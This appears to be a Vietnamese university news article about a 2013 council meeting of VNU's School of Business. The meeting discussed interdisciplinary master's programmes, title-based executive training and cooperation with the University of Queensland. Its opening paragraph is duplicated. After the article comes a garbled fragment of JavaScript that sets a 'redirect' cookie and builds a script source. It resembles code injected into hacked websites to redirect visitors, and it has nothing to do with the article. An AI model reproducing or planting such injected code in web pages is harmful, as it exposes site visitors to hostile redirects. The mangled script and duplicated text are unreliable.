HoiThao70Ngày 10/9/2013, Khoa Quản trị Kinh doanh (HSB) thuộc ĐHQGHN (VNU) đã tổ chức thành công phiên họp Hội đồng Khoa học và Đào tạo HSB. Tham dự phiên họp có GS.TSKH. Vũ Minh Giang, Chủ tịch Hội đồng; GS.TS. Nguyễn Bách Khoa, ủy viên thư ký; GS.TS. Mai Trọng Nhuận, ủy viên; VS.TS. Nguyễn Huy Hiệu, ủy viên; GS.TS. Andrew Griffiths, Hiệu trưởng Trường Quản trị thuộc Đại học Queensland, ủy viên; GS.TS. Damian Hine, ĐH Queensland, ủy viên; PGS.TS. Hoàng Đình Phi, Phó Chủ tịch Hội đồng; cùng các thành viên khác trong hội đồng.

Ngày 10/9/2013, Khoa Quản trị Kinh doanh (HSB) thuộc ĐHQGHN (VNU) đã tổ chức thành công phiên họp Hội đồng Khoa học và Đào tạo HSB. Tham dự phiên họp có GS.TSKH. Vũ Minh Giang, Chủ tịch Hội đồng; GS.TS. Nguyễn Bách Khoa, ủy viên thư ký; GS.TS. Mai Trọng Nhuận, ủy viên; VS.TS. Nguyễn Huy Hiệu, ủy viên; GS.TS. Andrew Griffiths, Hiệu trưởng Trường Quản trị thuộc Đại học Queensland, ủy viên; GS.TS. Damian Hine, ĐH Queensland, ủy viên; PGS.TS. Hoàng Đình Phi, Phó Chủ tịch Hội đồng; cùng các thành viên khác trong hội đồng.

GSVuMinhGiang  thay-Khoa

GSMaiTrongNhuan Dr Andrew Griffiths

Sau khi nghe các báo cáo, trao đổi và thảo luận, các thành viên hội đồng đã nhất trí với định hướng phát triển nghiên cứu khoa học công nghệ quản trị liên ngành của HSB gắn kết chặt chẽ với quy hoạch phát triển các chương trình đào tạo của HSB theo 3 nhóm:
– Các chương trình đào tạo ngắn hạn theo yêu cầu của các tập đoàn, tổng công ty, doanh nghiệp, tổ chức trong và ngoài nước;
– Các chương trình đào tạo mới theo chuẩn chức danh được thiết kế và triển khai tại HSB như: Giám đốc công nghệ và phát triển doanh nghiệp (DOTE); Giám đốc chiến lược (CSO); Giám đốc marketing và thương hiệu (CMBO); Chuyên gia quản trị tài chính và tài sản (CAMP)…
– Các chương trình đào tạo thạc sỹ và tiến sỹ có nội dung đổi mới theo chuẩn quốc tế, mang tính liên ngành cao.
GS.TS. Andrew Griffths và GS.TS. Damian Hine đánh giá cao tinh thần tiên phong và sức lao động sáng tạo của các giáo sư ĐHQGHN và các giảng viên HSB trong việc đổi mới chương trình HSB-MBA và tham gia thiết kế các chương trình đào tạo thạc sỹ liên ngành mới như: biến đổi khí hậu, khoa học bền vững, quản trị công nghệ và phát triển doanh nghiệp, quản trị an ninh phi truyền thống…, trong đó có nhiều môn học liên ngành và nội dung tri thức cập nhật so với các trường ĐH thuộc Asean và ĐH Queensland với hơn 100 năm lịch sử.

HoiThao70
Một vấn đề mà tất cả các thành viên hội đồng đều quan tâm và giành nhiều thời gian thảo luận là kế hoạch thực hiện công tác đào tạo và phát triển đội ngũ các nhà khoa học trẻ kiêm giảng viên cho các chương trình đào tạo thạc sỹ liên ngành và đào tạo theo chuẩn chức danh. Là thành viên của Group of Eight (Go8) và Universitas 21 và đã được xếp trong Top 40 đại học hàng đầu thế giới bởi “Times Higher Education Supplement”, GS.TS. Andrew Griffiths khẳng định sẽ cùng với các giáo sư của ĐH Queensland tiếp tục hỗ trợ HSB trong việc trao đổi tài liệu giảng dạy, hợp tác nghiên cứu khoa học công nghệ, trao đổi giảng viên quốc tế và hỗ trợ đào tạo các giảng viên HSB tham gia các chương trình thạc sỹ liên ngành và chương trình đào tạo theo chuẩn chức danh trong thời gian tới.

HoiThao74

 

 

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}